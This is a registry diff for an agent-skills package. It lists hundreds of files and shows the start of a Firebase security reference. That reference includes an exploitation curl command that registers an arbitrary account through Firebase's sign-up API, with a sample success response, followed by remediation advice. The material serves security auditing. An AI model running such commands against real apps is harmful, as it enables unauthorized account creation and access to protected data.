@elizaos/skills 2.0.0-alpha.3
This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
- package/README.md +126 -0
- package/package.json +53 -0
- package/skills/1password/SKILL.md +70 -0
- package/skills/1password/references/cli-examples.md +29 -0
- package/skills/1password/references/get-started.md +17 -0
- package/skills/apple-notes/SKILL.md +77 -0
- package/skills/apple-reminders/SKILL.md +96 -0
- package/skills/bear-notes/SKILL.md +107 -0
- package/skills/bird/SKILL.md +224 -0
- package/skills/blogwatcher/SKILL.md +69 -0
- package/skills/blucli/SKILL.md +47 -0
- package/skills/bluebubbles/SKILL.md +131 -0
- package/skills/camsnap/SKILL.md +45 -0
- package/skills/canvas/SKILL.md +203 -0
- package/skills/clawhub/SKILL.md +77 -0
- package/skills/coding-agent/SKILL.md +284 -0
- package/skills/discord/SKILL.md +578 -0
- package/skills/eightctl/SKILL.md +50 -0
- package/skills/food-order/SKILL.md +48 -0
- package/skills/gemini/SKILL.md +43 -0
- package/skills/gifgrep/SKILL.md +79 -0
- package/skills/github/SKILL.md +77 -0
- package/skills/gog/SKILL.md +116 -0
- package/skills/goplaces/SKILL.md +52 -0
- package/skills/healthcheck/SKILL.md +245 -0
- package/skills/himalaya/SKILL.md +257 -0
- package/skills/himalaya/references/configuration.md +184 -0
- package/skills/himalaya/references/message-composition.md +199 -0
- package/skills/imsg/SKILL.md +74 -0
- package/skills/local-places/SERVER_README.md +101 -0
- package/skills/local-places/SKILL.md +102 -0
- package/skills/local-places/pyproject.toml +21 -0
- package/skills/local-places/src/local_places/__init__.py +2 -0
- package/skills/local-places/src/local_places/google_places.py +314 -0
- package/skills/local-places/src/local_places/main.py +65 -0
- package/skills/local-places/src/local_places/schemas.py +107 -0
- package/skills/mcporter/SKILL.md +61 -0
- package/skills/model-usage/SKILL.md +69 -0
- package/skills/model-usage/references/codexbar-cli.md +33 -0
- package/skills/model-usage/scripts/model_usage.py +310 -0
- package/skills/nano-banana-pro/SKILL.md +58 -0
- package/skills/nano-banana-pro/scripts/generate_image.py +184 -0
- package/skills/nano-pdf/SKILL.md +38 -0
- package/skills/notion/SKILL.md +172 -0
- package/skills/obsidian/SKILL.md +81 -0
- package/skills/openai-image-gen/SKILL.md +89 -0
- package/skills/openai-image-gen/scripts/gen.py +240 -0
- package/skills/openai-whisper/SKILL.md +38 -0
- package/skills/openai-whisper-api/SKILL.md +52 -0
- package/skills/openai-whisper-api/scripts/transcribe.sh +85 -0
- package/skills/openhue/SKILL.md +51 -0
- package/skills/oracle/SKILL.md +125 -0
- package/skills/ordercli/SKILL.md +78 -0
- package/skills/peekaboo/SKILL.md +190 -0
- package/skills/sag/SKILL.md +87 -0
- package/skills/security-ask-questions-if-underspecified/.claude-plugin/plugin.json +10 -0
- package/skills/security-ask-questions-if-underspecified/README.md +24 -0
- package/skills/security-ask-questions-if-underspecified/skills/ask-questions-if-underspecified/SKILL.md +85 -0
- package/skills/security-audit-context-building/.claude-plugin/plugin.json +10 -0
- package/skills/security-audit-context-building/README.md +58 -0
- package/skills/security-audit-context-building/commands/audit-context.md +21 -0
- package/skills/security-audit-context-building/skills/audit-context-building/SKILL.md +297 -0
- package/skills/security-audit-context-building/skills/audit-context-building/resources/COMPLETENESS_CHECKLIST.md +47 -0
- package/skills/security-audit-context-building/skills/audit-context-building/resources/FUNCTION_MICRO_ANALYSIS_EXAMPLE.md +355 -0
- package/skills/security-audit-context-building/skills/audit-context-building/resources/OUTPUT_REQUIREMENTS.md +71 -0
- package/skills/security-building-secure-contracts/.claude-plugin/plugin.json +10 -0
- package/skills/security-building-secure-contracts/README.md +241 -0
- package/skills/security-building-secure-contracts/skills/algorand-vulnerability-scanner/SKILL.md +284 -0
- package/skills/security-building-secure-contracts/skills/algorand-vulnerability-scanner/resources/VULNERABILITY_PATTERNS.md +405 -0
- package/skills/security-building-secure-contracts/skills/audit-prep-assistant/SKILL.md +409 -0
- package/skills/security-building-secure-contracts/skills/cairo-vulnerability-scanner/SKILL.md +329 -0
- package/skills/security-building-secure-contracts/skills/cairo-vulnerability-scanner/resources/VULNERABILITY_PATTERNS.md +722 -0
- package/skills/security-building-secure-contracts/skills/code-maturity-assessor/SKILL.md +218 -0
- package/skills/security-building-secure-contracts/skills/code-maturity-assessor/resources/ASSESSMENT_CRITERIA.md +355 -0
- package/skills/security-building-secure-contracts/skills/code-maturity-assessor/resources/EXAMPLE_REPORT.md +248 -0
- package/skills/security-building-secure-contracts/skills/code-maturity-assessor/resources/REPORT_FORMAT.md +33 -0
- package/skills/security-building-secure-contracts/skills/cosmos-vulnerability-scanner/SKILL.md +334 -0
- package/skills/security-building-secure-contracts/skills/cosmos-vulnerability-scanner/resources/VULNERABILITY_PATTERNS.md +740 -0
- package/skills/security-building-secure-contracts/skills/guidelines-advisor/SKILL.md +252 -0
- package/skills/security-building-secure-contracts/skills/guidelines-advisor/resources/ASSESSMENT_AREAS.md +329 -0
- package/skills/security-building-secure-contracts/skills/guidelines-advisor/resources/DELIVERABLES.md +118 -0
- package/skills/security-building-secure-contracts/skills/guidelines-advisor/resources/EXAMPLE_REPORT.md +298 -0
- package/skills/security-building-secure-contracts/skills/secure-workflow-guide/SKILL.md +161 -0
- package/skills/security-building-secure-contracts/skills/secure-workflow-guide/resources/EXAMPLE_REPORT.md +279 -0
- package/skills/security-building-secure-contracts/skills/secure-workflow-guide/resources/WORKFLOW_STEPS.md +132 -0
- package/skills/security-building-secure-contracts/skills/solana-vulnerability-scanner/SKILL.md +389 -0
- package/skills/security-building-secure-contracts/skills/solana-vulnerability-scanner/resources/VULNERABILITY_PATTERNS.md +669 -0
- package/skills/security-building-secure-contracts/skills/substrate-vulnerability-scanner/SKILL.md +298 -0
- package/skills/security-building-secure-contracts/skills/substrate-vulnerability-scanner/resources/VULNERABILITY_PATTERNS.md +791 -0
- package/skills/security-building-secure-contracts/skills/token-integration-analyzer/SKILL.md +362 -0
- package/skills/security-building-secure-contracts/skills/token-integration-analyzer/resources/ASSESSMENT_CATEGORIES.md +571 -0
- package/skills/security-building-secure-contracts/skills/token-integration-analyzer/resources/REPORT_TEMPLATES.md +141 -0
- package/skills/security-building-secure-contracts/skills/ton-vulnerability-scanner/SKILL.md +388 -0
- package/skills/security-building-secure-contracts/skills/ton-vulnerability-scanner/resources/VULNERABILITY_PATTERNS.md +595 -0
- package/skills/security-burpsuite-project-parser/.claude-plugin/plugin.json +10 -0
- package/skills/security-burpsuite-project-parser/README.md +103 -0
- package/skills/security-burpsuite-project-parser/commands/burp-search.md +18 -0
- package/skills/security-burpsuite-project-parser/skills/SKILL.md +358 -0
- package/skills/security-burpsuite-project-parser/skills/scripts/burp-search.sh +99 -0
- package/skills/security-claude-in-chrome-troubleshooting/.claude-plugin/plugin.json +8 -0
- package/skills/security-claude-in-chrome-troubleshooting/README.md +31 -0
- package/skills/security-claude-in-chrome-troubleshooting/skills/claude-in-chrome-troubleshooting/SKILL.md +251 -0
- package/skills/security-constant-time-analysis/.claude-plugin/plugin.json +9 -0
- package/skills/security-constant-time-analysis/README.md +381 -0
- package/skills/security-constant-time-analysis/commands/ct-check.md +20 -0
- package/skills/security-constant-time-analysis/ct_analyzer/__init__.py +49 -0
- package/skills/security-constant-time-analysis/ct_analyzer/analyzer.py +1284 -0
- package/skills/security-constant-time-analysis/ct_analyzer/script_analyzers.py +3081 -0
- package/skills/security-constant-time-analysis/ct_analyzer/tests/__init__.py +1 -0
- package/skills/security-constant-time-analysis/ct_analyzer/tests/test_analyzer.py +1397 -0
- package/skills/security-constant-time-analysis/ct_analyzer/tests/test_samples/bn_excerpt.js +205 -0
- package/skills/security-constant-time-analysis/ct_analyzer/tests/test_samples/decompose_constant_time.c +181 -0
- package/skills/security-constant-time-analysis/ct_analyzer/tests/test_samples/decompose_vulnerable.c +74 -0
- package/skills/security-constant-time-analysis/ct_analyzer/tests/test_samples/decompose_vulnerable.go +78 -0
- package/skills/security-constant-time-analysis/ct_analyzer/tests/test_samples/decompose_vulnerable.rs +92 -0
- package/skills/security-constant-time-analysis/ct_analyzer/tests/test_samples/vulnerable.cs +174 -0
- package/skills/security-constant-time-analysis/ct_analyzer/tests/test_samples/vulnerable.java +161 -0
- package/skills/security-constant-time-analysis/ct_analyzer/tests/test_samples/vulnerable.kt +181 -0
- package/skills/security-constant-time-analysis/ct_analyzer/tests/test_samples/vulnerable.php +140 -0
- package/skills/security-constant-time-analysis/ct_analyzer/tests/test_samples/vulnerable.py +252 -0
- package/skills/security-constant-time-analysis/ct_analyzer/tests/test_samples/vulnerable.rb +188 -0
- package/skills/security-constant-time-analysis/ct_analyzer/tests/test_samples/vulnerable.swift +199 -0
- package/skills/security-constant-time-analysis/ct_analyzer/tests/test_samples/vulnerable.ts +154 -0
- package/skills/security-constant-time-analysis/pyproject.toml +52 -0
- package/skills/security-constant-time-analysis/skills/constant-time-analysis/README.md +90 -0
- package/skills/security-constant-time-analysis/skills/constant-time-analysis/SKILL.md +219 -0
- package/skills/security-constant-time-analysis/skills/constant-time-analysis/references/compiled.md +129 -0
- package/skills/security-constant-time-analysis/skills/constant-time-analysis/references/javascript.md +136 -0
- package/skills/security-constant-time-analysis/skills/constant-time-analysis/references/kotlin.md +252 -0
- package/skills/security-constant-time-analysis/skills/constant-time-analysis/references/php.md +172 -0
- package/skills/security-constant-time-analysis/skills/constant-time-analysis/references/python.md +179 -0
- package/skills/security-constant-time-analysis/skills/constant-time-analysis/references/ruby.md +198 -0
- package/skills/security-constant-time-analysis/skills/constant-time-analysis/references/swift.md +288 -0
- package/skills/security-constant-time-analysis/skills/constant-time-analysis/references/vm-compiled.md +354 -0
- package/skills/security-constant-time-analysis/uv.lock +8 -0
- package/skills/security-culture-index/.claude-plugin/plugin.json +8 -0
- package/skills/security-culture-index/README.md +79 -0
- package/skills/security-culture-index/skills/interpreting-culture-index/SKILL.md +293 -0
- package/skills/security-culture-index/skills/interpreting-culture-index/references/anti-patterns.md +255 -0
- package/skills/security-culture-index/skills/interpreting-culture-index/references/conversation-starters.md +408 -0
- package/skills/security-culture-index/skills/interpreting-culture-index/references/interview-trait-signals.md +253 -0
- package/skills/security-culture-index/skills/interpreting-culture-index/references/motivators.md +158 -0
- package/skills/security-culture-index/skills/interpreting-culture-index/references/patterns-archetypes.md +147 -0
- package/skills/security-culture-index/skills/interpreting-culture-index/references/primary-traits.md +307 -0
- package/skills/security-culture-index/skills/interpreting-culture-index/references/secondary-traits.md +228 -0
- package/skills/security-culture-index/skills/interpreting-culture-index/references/team-composition.md +148 -0
- package/skills/security-culture-index/skills/interpreting-culture-index/scripts/check_deps.py +108 -0
- package/skills/security-culture-index/skills/interpreting-culture-index/scripts/culture_index/__init__.py +20 -0
- package/skills/security-culture-index/skills/interpreting-culture-index/scripts/culture_index/constants.py +122 -0
- package/skills/security-culture-index/skills/interpreting-culture-index/scripts/culture_index/extract.py +187 -0
- package/skills/security-culture-index/skills/interpreting-culture-index/scripts/culture_index/models.py +16 -0
- package/skills/security-culture-index/skills/interpreting-culture-index/scripts/culture_index/opencv_extractor.py +520 -0
- package/skills/security-culture-index/skills/interpreting-culture-index/scripts/extract_pdf.py +237 -0
- package/skills/security-culture-index/skills/interpreting-culture-index/scripts/pyproject.toml +18 -0
- package/skills/security-culture-index/skills/interpreting-culture-index/templates/burnout-report.md +113 -0
- package/skills/security-culture-index/skills/interpreting-culture-index/templates/comparison-report.md +103 -0
- package/skills/security-culture-index/skills/interpreting-culture-index/templates/hiring-profile.md +127 -0
- package/skills/security-culture-index/skills/interpreting-culture-index/templates/individual-report.md +85 -0
- package/skills/security-culture-index/skills/interpreting-culture-index/templates/predicted-profile.md +165 -0
- package/skills/security-culture-index/skills/interpreting-culture-index/templates/team-report.md +109 -0
- package/skills/security-culture-index/skills/interpreting-culture-index/workflows/analyze-team.md +188 -0
- package/skills/security-culture-index/skills/interpreting-culture-index/workflows/coach-manager.md +267 -0
- package/skills/security-culture-index/skills/interpreting-culture-index/workflows/compare-profiles.md +188 -0
- package/skills/security-culture-index/skills/interpreting-culture-index/workflows/define-hiring-profile.md +220 -0
- package/skills/security-culture-index/skills/interpreting-culture-index/workflows/detect-burnout.md +206 -0
- package/skills/security-culture-index/skills/interpreting-culture-index/workflows/extract-from-pdf.md +121 -0
- package/skills/security-culture-index/skills/interpreting-culture-index/workflows/interpret-individual.md +183 -0
- package/skills/security-culture-index/skills/interpreting-culture-index/workflows/interview-debrief.md +234 -0
- package/skills/security-culture-index/skills/interpreting-culture-index/workflows/mediate-conflict.md +306 -0
- package/skills/security-culture-index/skills/interpreting-culture-index/workflows/plan-onboarding.md +322 -0
- package/skills/security-culture-index/skills/interpreting-culture-index/workflows/predict-from-interview.md +250 -0
- package/skills/security-differential-review/.claude-plugin/plugin.json +10 -0
- package/skills/security-differential-review/README.md +109 -0
- package/skills/security-differential-review/commands/diff-review.md +21 -0
- package/skills/security-differential-review/skills/differential-review/SKILL.md +220 -0
- package/skills/security-differential-review/skills/differential-review/adversarial.md +203 -0
- package/skills/security-differential-review/skills/differential-review/methodology.md +234 -0
- package/skills/security-differential-review/skills/differential-review/patterns.md +300 -0
- package/skills/security-differential-review/skills/differential-review/reporting.md +369 -0
- package/skills/security-dwarf-expert/.claude-plugin/plugin.json +10 -0
- package/skills/security-dwarf-expert/README.md +38 -0
- package/skills/security-dwarf-expert/skills/dwarf-expert/SKILL.md +93 -0
- package/skills/security-dwarf-expert/skills/dwarf-expert/reference/coding.md +31 -0
- package/skills/security-dwarf-expert/skills/dwarf-expert/reference/dwarfdump.md +50 -0
- package/skills/security-dwarf-expert/skills/dwarf-expert/reference/readelf.md +8 -0
- package/skills/security-entry-point-analyzer/.claude-plugin/plugin.json +10 -0
- package/skills/security-entry-point-analyzer/README.md +74 -0
- package/skills/security-entry-point-analyzer/commands/entry-points.md +18 -0
- package/skills/security-entry-point-analyzer/skills/entry-point-analyzer/SKILL.md +251 -0
- package/skills/security-entry-point-analyzer/skills/entry-point-analyzer/references/cosmwasm.md +182 -0
- package/skills/security-entry-point-analyzer/skills/entry-point-analyzer/references/move-aptos.md +107 -0
- package/skills/security-entry-point-analyzer/skills/entry-point-analyzer/references/move-sui.md +87 -0
- package/skills/security-entry-point-analyzer/skills/entry-point-analyzer/references/solana.md +155 -0
- package/skills/security-entry-point-analyzer/skills/entry-point-analyzer/references/solidity.md +135 -0
- package/skills/security-entry-point-analyzer/skills/entry-point-analyzer/references/ton.md +185 -0
- package/skills/security-entry-point-analyzer/skills/entry-point-analyzer/references/vyper.md +141 -0
- package/skills/security-firebase-apk-scanner/.claude-plugin/plugin.json +10 -0
- package/skills/security-firebase-apk-scanner/README.md +85 -0
- package/skills/security-firebase-apk-scanner/commands/scan-apk.md +18 -0
- package/skills/security-firebase-apk-scanner/scanner.sh +1408 -0
- package/skills/security-firebase-apk-scanner/skills/firebase-apk-scanner/SKILL.md +197 -0
- package/skills/security-firebase-apk-scanner/skills/firebase-apk-scanner/references/vulnerabilities.md +803 -0
- package/skills/security-fix-review/.claude-plugin/plugin.json +13 -0
- package/skills/security-fix-review/README.md +118 -0
- package/skills/security-fix-review/commands/fix-review.md +24 -0
- package/skills/security-fix-review/skills/fix-review/SKILL.md +264 -0
- package/skills/security-fix-review/skills/fix-review/references/bug-detection.md +408 -0
- package/skills/security-fix-review/skills/fix-review/references/finding-matching.md +298 -0
- package/skills/security-fix-review/skills/fix-review/references/report-parsing.md +398 -0
- package/skills/security-insecure-defaults/.claude-plugin/plugin.json +10 -0
- package/skills/security-insecure-defaults/README.md +45 -0
- package/skills/security-insecure-defaults/skills/insecure-defaults/SKILL.md +117 -0
- package/skills/security-insecure-defaults/skills/insecure-defaults/references/examples.md +409 -0
- package/skills/security-modern-python/.claude-plugin/plugin.json +10 -0
- package/skills/security-modern-python/README.md +58 -0
- package/skills/security-modern-python/hooks/hooks.json +16 -0
- package/skills/security-modern-python/hooks/intercept-legacy-python.bats +388 -0
- package/skills/security-modern-python/hooks/intercept-legacy-python.sh +109 -0
- package/skills/security-modern-python/hooks/test_helper.bash +75 -0
- package/skills/security-modern-python/skills/modern-python/SKILL.md +333 -0
- package/skills/security-modern-python/skills/modern-python/references/dependabot.md +43 -0
- package/skills/security-modern-python/skills/modern-python/references/migration-checklist.md +141 -0
- package/skills/security-modern-python/skills/modern-python/references/pep723-scripts.md +259 -0
- package/skills/security-modern-python/skills/modern-python/references/prek.md +211 -0
- package/skills/security-modern-python/skills/modern-python/references/pyproject.md +254 -0
- package/skills/security-modern-python/skills/modern-python/references/ruff-config.md +240 -0
- package/skills/security-modern-python/skills/modern-python/references/security-setup.md +255 -0
- package/skills/security-modern-python/skills/modern-python/references/testing.md +284 -0
- package/skills/security-modern-python/skills/modern-python/references/uv-commands.md +200 -0
- package/skills/security-modern-python/skills/modern-python/templates/dependabot.yml +36 -0
- package/skills/security-modern-python/skills/modern-python/templates/pre-commit-config.yaml +66 -0
- package/skills/security-property-based-testing/.claude-plugin/plugin.json +9 -0
- package/skills/security-property-based-testing/README.md +47 -0
- package/skills/security-property-based-testing/skills/property-based-testing/README.md +88 -0
- package/skills/security-property-based-testing/skills/property-based-testing/SKILL.md +109 -0
- package/skills/security-property-based-testing/skills/property-based-testing/references/design.md +191 -0
- package/skills/security-property-based-testing/skills/property-based-testing/references/generating.md +200 -0
- package/skills/security-property-based-testing/skills/property-based-testing/references/libraries.md +130 -0
- package/skills/security-property-based-testing/skills/property-based-testing/references/refactoring.md +181 -0
- package/skills/security-property-based-testing/skills/property-based-testing/references/reviewing.md +209 -0
- package/skills/security-property-based-testing/skills/property-based-testing/references/strategies.md +124 -0
- package/skills/semgrep-rule-creator/.claude-plugin/plugin.json +8 -0
- package/skills/semgrep-rule-creator/README.md +43 -0
- package/skills/semgrep-rule-creator/commands/semgrep-rule.md +26 -0
- package/skills/semgrep-rule-creator/skills/semgrep-rule-creator/SKILL.md +168 -0
- package/skills/semgrep-rule-creator/skills/semgrep-rule-creator/references/quick-reference.md +203 -0
- package/skills/semgrep-rule-creator/skills/semgrep-rule-creator/references/workflow.md +240 -0
- package/skills/semgrep-rule-variant-creator/.claude-plugin/plugin.json +9 -0
- package/skills/semgrep-rule-variant-creator/README.md +86 -0
- package/skills/semgrep-rule-variant-creator/skills/semgrep-rule-variant-creator/SKILL.md +205 -0
- package/skills/semgrep-rule-variant-creator/skills/semgrep-rule-variant-creator/references/applicability-analysis.md +250 -0
- package/skills/semgrep-rule-variant-creator/skills/semgrep-rule-variant-creator/references/language-syntax-guide.md +324 -0
- package/skills/semgrep-rule-variant-creator/skills/semgrep-rule-variant-creator/references/workflow.md +518 -0
- package/skills/session-logs/SKILL.md +115 -0
- package/skills/sharp-edges/.claude-plugin/plugin.json +10 -0
- package/skills/sharp-edges/README.md +48 -0
- package/skills/sharp-edges/skills/sharp-edges/SKILL.md +292 -0
- package/skills/sharp-edges/skills/sharp-edges/references/auth-patterns.md +252 -0
- package/skills/sharp-edges/skills/sharp-edges/references/case-studies.md +274 -0
- package/skills/sharp-edges/skills/sharp-edges/references/config-patterns.md +333 -0
- package/skills/sharp-edges/skills/sharp-edges/references/crypto-apis.md +190 -0
- package/skills/sharp-edges/skills/sharp-edges/references/lang-c.md +205 -0
- package/skills/sharp-edges/skills/sharp-edges/references/lang-csharp.md +285 -0
- package/skills/sharp-edges/skills/sharp-edges/references/lang-go.md +270 -0
- package/skills/sharp-edges/skills/sharp-edges/references/lang-java.md +263 -0
- package/skills/sharp-edges/skills/sharp-edges/references/lang-javascript.md +269 -0
- package/skills/sharp-edges/skills/sharp-edges/references/lang-kotlin.md +265 -0
- package/skills/sharp-edges/skills/sharp-edges/references/lang-php.md +245 -0
- package/skills/sharp-edges/skills/sharp-edges/references/lang-python.md +274 -0
- package/skills/sharp-edges/skills/sharp-edges/references/lang-ruby.md +273 -0
- package/skills/sharp-edges/skills/sharp-edges/references/lang-rust.md +272 -0
- package/skills/sharp-edges/skills/sharp-edges/references/lang-swift.md +287 -0
- package/skills/sharp-edges/skills/sharp-edges/references/language-specific.md +588 -0
- package/skills/sherpa-onnx-tts/SKILL.md +103 -0
- package/skills/sherpa-onnx-tts/bin/sherpa-onnx-tts +178 -0
- package/skills/skill-creator/SKILL.md +370 -0
- package/skills/skill-creator/license.txt +202 -0
- package/skills/skill-creator/scripts/init_skill.py +378 -0
- package/skills/skill-creator/scripts/package_skill.py +111 -0
- package/skills/skill-creator/scripts/quick_validate.py +101 -0
- package/skills/slack/SKILL.md +144 -0
- package/skills/songsee/SKILL.md +49 -0
- package/skills/sonoscli/SKILL.md +46 -0
- package/skills/spec-to-code-compliance/.claude-plugin/plugin.json +10 -0
- package/skills/spec-to-code-compliance/README.md +67 -0
- package/skills/spec-to-code-compliance/commands/spec-compliance.md +22 -0
- package/skills/spec-to-code-compliance/skills/spec-to-code-compliance/SKILL.md +349 -0
- package/skills/spec-to-code-compliance/skills/spec-to-code-compliance/resources/COMPLETENESS_CHECKLIST.md +69 -0
- package/skills/spec-to-code-compliance/skills/spec-to-code-compliance/resources/IR_EXAMPLES.md +417 -0
- package/skills/spec-to-code-compliance/skills/spec-to-code-compliance/resources/OUTPUT_REQUIREMENTS.md +105 -0
- package/skills/spotify-player/SKILL.md +64 -0
- package/skills/static-analysis/.claude-plugin/plugin.json +8 -0
- package/skills/static-analysis/README.md +59 -0
- package/skills/static-analysis/skills/codeql/SKILL.md +315 -0
- package/skills/static-analysis/skills/sarif-parsing/SKILL.md +479 -0
- package/skills/static-analysis/skills/sarif-parsing/resources/jq-queries.md +162 -0
- package/skills/static-analysis/skills/sarif-parsing/resources/sarif_helpers.py +331 -0
- package/skills/static-analysis/skills/semgrep/SKILL.md +337 -0
- package/skills/summarize/SKILL.md +87 -0
- package/skills/testing-handbook-skills/.claude-plugin/plugin.json +8 -0
- package/skills/testing-handbook-skills/README.md +241 -0
- package/skills/testing-handbook-skills/scripts/pyproject.toml +8 -0
- package/skills/testing-handbook-skills/scripts/validate-skills.py +657 -0
- package/skills/testing-handbook-skills/skills/address-sanitizer/SKILL.md +341 -0
- package/skills/testing-handbook-skills/skills/aflpp/SKILL.md +640 -0
- package/skills/testing-handbook-skills/skills/atheris/SKILL.md +515 -0
- package/skills/testing-handbook-skills/skills/cargo-fuzz/SKILL.md +454 -0
- package/skills/testing-handbook-skills/skills/codeql/SKILL.md +549 -0
- package/skills/testing-handbook-skills/skills/constant-time-testing/SKILL.md +507 -0
- package/skills/testing-handbook-skills/skills/coverage-analysis/SKILL.md +607 -0
- package/skills/testing-handbook-skills/skills/fuzzing-dictionary/SKILL.md +297 -0
- package/skills/testing-handbook-skills/skills/fuzzing-obstacles/SKILL.md +426 -0
- package/skills/testing-handbook-skills/skills/harness-writing/SKILL.md +614 -0
- package/skills/testing-handbook-skills/skills/libafl/SKILL.md +625 -0
- package/skills/testing-handbook-skills/skills/libfuzzer/SKILL.md +795 -0
- package/skills/testing-handbook-skills/skills/ossfuzz/SKILL.md +426 -0
- package/skills/testing-handbook-skills/skills/ruzzy/SKILL.md +443 -0
- package/skills/testing-handbook-skills/skills/semgrep/SKILL.md +601 -0
- package/skills/testing-handbook-skills/skills/testing-handbook-generator/SKILL.md +372 -0
- package/skills/testing-handbook-skills/skills/testing-handbook-generator/agent-prompt.md +280 -0
- package/skills/testing-handbook-skills/skills/testing-handbook-generator/discovery.md +452 -0
- package/skills/testing-handbook-skills/skills/testing-handbook-generator/templates/domain-skill.md +504 -0
- package/skills/testing-handbook-skills/skills/testing-handbook-generator/templates/fuzzer-skill.md +454 -0
- package/skills/testing-handbook-skills/skills/testing-handbook-generator/templates/technique-skill.md +527 -0
- package/skills/testing-handbook-skills/skills/testing-handbook-generator/templates/tool-skill.md +366 -0
- package/skills/testing-handbook-skills/skills/testing-handbook-generator/testing.md +482 -0
- package/skills/testing-handbook-skills/skills/wycheproof/SKILL.md +533 -0
- package/skills/things-mac/SKILL.md +86 -0
- package/skills/tmux/SKILL.md +135 -0
- package/skills/tmux/scripts/find-sessions.sh +112 -0
- package/skills/tmux/scripts/wait-for-text.sh +83 -0
- package/skills/trello/SKILL.md +95 -0
- package/skills/variant-analysis/.claude-plugin/plugin.json +8 -0
- package/skills/variant-analysis/README.md +41 -0
- package/skills/variant-analysis/commands/variants.md +23 -0
- package/skills/variant-analysis/skills/variant-analysis/METHODOLOGY.md +327 -0
- package/skills/variant-analysis/skills/variant-analysis/SKILL.md +142 -0
- package/skills/variant-analysis/skills/variant-analysis/resources/codeql/cpp.ql +119 -0
- package/skills/variant-analysis/skills/variant-analysis/resources/codeql/go.ql +69 -0
- package/skills/variant-analysis/skills/variant-analysis/resources/codeql/java.ql +71 -0
- package/skills/variant-analysis/skills/variant-analysis/resources/codeql/javascript.ql +63 -0
- package/skills/variant-analysis/skills/variant-analysis/resources/codeql/python.ql +80 -0
- package/skills/variant-analysis/skills/variant-analysis/resources/semgrep/cpp.yaml +98 -0
- package/skills/variant-analysis/skills/variant-analysis/resources/semgrep/go.yaml +63 -0
- package/skills/variant-analysis/skills/variant-analysis/resources/semgrep/java.yaml +61 -0
- package/skills/variant-analysis/skills/variant-analysis/resources/semgrep/javascript.yaml +60 -0
- package/skills/variant-analysis/skills/variant-analysis/resources/semgrep/python.yaml +72 -0
- package/skills/variant-analysis/skills/variant-analysis/resources/variant-report-template.md +75 -0
- package/skills/video-frames/SKILL.md +46 -0
- package/skills/video-frames/scripts/frame.sh +81 -0
- package/skills/voice-call/SKILL.md +45 -0
- package/skills/wacli/SKILL.md +72 -0
- package/skills/weather/SKILL.md +54 -0
- package/skills/yara-authoring/.claude-plugin/plugin.json +9 -0
- package/skills/yara-authoring/README.md +131 -0
- package/skills/yara-authoring/skills/yara-rule-authoring/SKILL.md +645 -0
- package/skills/yara-authoring/skills/yara-rule-authoring/examples/MAL_Mac_ProtonRAT_Jan25.yar +99 -0
- package/skills/yara-authoring/skills/yara-rule-authoring/examples/MAL_NPM_SupplyChain_Jan25.yar +170 -0
- package/skills/yara-authoring/skills/yara-rule-authoring/examples/MAL_Win_Remcos_Jan25.yar +103 -0
- package/skills/yara-authoring/skills/yara-rule-authoring/examples/SUSP_CRX_SuspiciousPermissions.yar +134 -0
- package/skills/yara-authoring/skills/yara-rule-authoring/examples/SUSP_JS_Obfuscation_Jan25.yar +185 -0
- package/skills/yara-authoring/skills/yara-rule-authoring/references/crx-module.md +214 -0
- package/skills/yara-authoring/skills/yara-rule-authoring/references/dex-module.md +383 -0
- package/skills/yara-authoring/skills/yara-rule-authoring/references/performance.md +333 -0
- package/skills/yara-authoring/skills/yara-rule-authoring/references/strings.md +433 -0
- package/skills/yara-authoring/skills/yara-rule-authoring/references/style-guide.md +257 -0
- package/skills/yara-authoring/skills/yara-rule-authoring/references/testing.md +399 -0
- package/skills/yara-authoring/skills/yara-rule-authoring/scripts/atom_analyzer.py +526 -0
- package/skills/yara-authoring/skills/yara-rule-authoring/scripts/pyproject.toml +25 -0
- package/skills/yara-authoring/skills/yara-rule-authoring/scripts/yara_lint.py +631 -0
- package/skills/yara-authoring/skills/yara-rule-authoring/workflows/rule-development.md +493 -0
|
@@ -0,0 +1,803 @@
|
|
|
1
|
+
# Firebase Security Vulnerability Patterns
|
|
2
|
+
|
|
3
|
+
Detailed vulnerability patterns, exploitation techniques, and audit checklists for Firebase implementations in mobile applications.
|
|
4
|
+
|
|
5
|
+
---
|
|
6
|
+
|
|
7
|
+
## 1. OPEN EMAIL/PASSWORD SIGNUP (Critical)
|
|
8
|
+
|
|
9
|
+
**The Problem:** Firebase Authentication allows anyone to create accounts via the Identity Toolkit API, even if the app UI doesn't expose registration.
|
|
10
|
+
|
|
11
|
+
**Vulnerable Configuration:**
|
|
12
|
+
```
|
|
13
|
+
Firebase Console → Authentication → Sign-in method → Email/Password: Enabled
|
|
14
|
+
```
|
|
15
|
+
|
|
16
|
+
**Exploitation:**
|
|
17
|
+
```bash
|
|
18
|
+
# Create arbitrary account via API
|
|
19
|
+
curl -X POST \
|
|
20
|
+
-H "Content-Type: application/json" \
|
|
21
|
+
-d '{"email":"attacker@evil.com","password":"Password123!","returnSecureToken":true}' \
|
|
22
|
+
"https://identitytoolkit.googleapis.com/v1/accounts:signUp?key=AIzaXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX"
|
|
23
|
+
```
|
|
24
|
+
|
|
25
|
+
**Successful Attack Response:**
|
|
26
|
+
```json
|
|
27
|
+
{
|
|
28
|
+
"idToken": "eyJhbGciOiJSUzI1NiIs...",
|
|
29
|
+
"email": "attacker@evil.com",
|
|
30
|
+
"refreshToken": "AGEhc0C...",
|
|
31
|
+
"expiresIn": "3600",
|
|
32
|
+
"localId": "abc123xyz"
|
|
33
|
+
}
|
|
34
|
+
```
|
|
35
|
+
|
|
36
|
+
**Impact:**
|
|
37
|
+
- Bypass invite-only systems
|
|
38
|
+
- Access authenticated-only resources
|
|
39
|
+
- Exhaust authentication quotas
|
|
40
|
+
- Potential for account enumeration attacks
|
|
41
|
+
|
|
42
|
+
**Secure Configuration:**
|
|
43
|
+
```
|
|
44
|
+
Firebase Console → Authentication → Settings → User Actions:
|
|
45
|
+
☐ Enable create (sign-up) ← DISABLE THIS
|
|
46
|
+
☑ Enable delete
|
|
47
|
+
|
|
48
|
+
Or use Admin SDK for user creation only:
|
|
49
|
+
```
|
|
50
|
+
```javascript
|
|
51
|
+
// Server-side only user creation
|
|
52
|
+
const admin = require('firebase-admin');
|
|
53
|
+
admin.auth().createUser({
|
|
54
|
+
email: 'user@example.com',
|
|
55
|
+
password: 'securePassword123'
|
|
56
|
+
});
|
|
57
|
+
```
|
|
58
|
+
|
|
59
|
+
**Audit Checklist:**
|
|
